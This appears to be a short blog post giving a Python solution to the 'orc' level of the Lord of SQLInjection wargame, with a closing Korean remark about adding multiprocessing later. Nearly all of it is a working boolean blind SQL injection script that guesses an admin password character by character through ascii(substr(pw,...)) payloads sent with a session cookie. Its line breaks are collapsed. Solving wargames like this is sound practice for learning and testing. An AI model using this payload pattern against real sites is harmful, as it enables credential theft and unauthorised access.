[LOS] blind sql injection script

import requests, string pw = '' cookie = dict(PHPSESSID='8osfaao6p2u8dpb526iq2mhno2') for i in range(1, 9): for strings in string.digits + string.ascii_letters: url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='or id='admin'%26%26ascii(substr(pw," + str(i) + ",1))=" + str(ord(strings)) +"%23" req = requests.get(url, cookies = cookie) if req.text.find("<h2>Hello admin</h2>") > 0: pw += strings print (pw) break 나중엔 멀티프로세싱을 이용해 만들어보자